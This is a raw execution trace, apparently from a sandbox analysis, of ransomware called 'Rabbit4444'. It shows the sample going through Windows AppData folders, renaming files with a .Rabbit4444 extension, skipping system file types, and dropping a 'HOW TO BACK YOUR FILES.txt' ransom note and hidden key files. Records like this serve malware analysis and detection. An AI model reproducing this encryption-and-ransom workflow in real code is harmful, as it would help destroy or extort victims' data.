(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred", dwFileAttributes=0x6) returned 1 [0052.712] lstrlenW (lpString="Preferred") returned 9 [0052.712] lstrlenW (lpString="Rabbit4444") returned 10 [0052.712] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0052.712] lstrlenW (lpString=".dll") returned 4 [0052.712] lstrcmpiW (lpString1="rred", lpString2=".dll") returned 1 [0052.712] lstrlenW (lpString=".lnk") returned 4 [0052.712] lstrcmpiW (lpString1="rred", lpString2=".lnk") returned 1 [0052.713] lstrlenW (lpString=".ini") returned 4 [0052.713] lstrcmpiW (lpString1="rred", lpString2=".ini") returned 1 [0052.713] lstrlenW (lpString=".sys") returned 4 [0052.713] lstrcmpiW (lpString1="rred", lpString2=".sys") returned 1 [0052.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.713] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.713] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14402357043) returned 1 [0052.713] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=24) returned 1 [0052.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0052.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0052.713] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0052.722] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0052.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.723] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.723] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.724] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14403428258) returned 1 [0052.724] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0052.724] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0052.724] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.724] CloseHandle (hObject=0x298) returned 1 [0052.724] CloseHandle (hObject=0x278) returned 1 [0052.724] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred.Rabbit4444") returned 116 [0052.724] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred.rabbit4444"), dwFlags=0x1) returned 1 [0052.724] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a637b3f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a637b3f, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5c178632, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0052.724] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.725] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.725] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.726] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.726] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.726] CloseHandle (hObject=0x278) returned 1 [0052.726] CloseHandle (hObject=0x27c) returned 1 [0052.726] GetCurrentThreadId () returned 0xd98 [0052.726] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120818 [0052.726] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" [0052.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cb90 | out: hHeap=0xe0000) returned 1 [0052.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120810 | out: hHeap=0xe0000) returned 1 [0052.726] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" [0052.726] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\" [0052.726] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3" [0052.726] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\proof\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.730] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.732] FlushFileBuffers (hFile=0x27c) returned 1 [0052.733] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.734] CloseHandle (hObject=0x27c) returned 1 [0052.734] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned 47 [0052.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.734] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8c0a7e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0052.734] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.734] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.734] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.734] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.734] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8c0a7e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.734] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.734] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.735] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.735] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.735] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.735] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8c0a7e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8c0a7e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8c0a7e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.735] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.735] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.735] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8c0a7e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8c0a7e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8c0a7e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.735] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0052.735] lstrcpyW (in: lpString1=0x130eb98, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\proof\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.735] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.735] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.736] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.736] CloseHandle (hObject=0x278) returned 1 [0052.736] CloseHandle (hObject=0x27c) returned 1 [0052.736] GetCurrentThreadId () returned 0xd98 [0052.736] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120718 [0052.736] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" [0052.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0052.736] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120710 | out: hHeap=0xe0000) returned 1 [0052.736] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" [0052.736] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0052.736] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3" [0052.736] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\powerpoint\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.737] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.739] FlushFileBuffers (hFile=0x27c) returned 1 [0052.740] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.740] CloseHandle (hObject=0x27c) returned 1 [0052.741] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned 52 [0052.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.741] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.741] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.741] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.741] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.741] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.741] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.741] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.741] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.741] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.741] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.741] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8c26f11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8c26f11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.741] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.741] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.741] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8c26f11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8c26f11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.742] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.742] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.742] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\powerpoint\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.742] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.743] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.743] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.743] CloseHandle (hObject=0x278) returned 1 [0052.743] CloseHandle (hObject=0x27c) returned 1 [0052.743] GetCurrentThreadId () returned 0xd98 [0052.743] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.743] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" [0052.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0052.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.743] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook" [0052.743] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\" [0052.743] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3" [0052.743] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.744] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.747] FlushFileBuffers (hFile=0x27c) returned 1 [0052.747] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.748] CloseHandle (hObject=0x27c) returned 1 [0052.748] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook") returned 49 [0052.748] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.748] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0052.748] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.748] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.748] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.748] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.748] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.748] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.748] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.748] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.748] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.748] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.748] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8c26f11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8c26f11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8c26f11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.749] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.749] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.749] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac358392, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xac358392, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xac4aebd0, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0xa00, 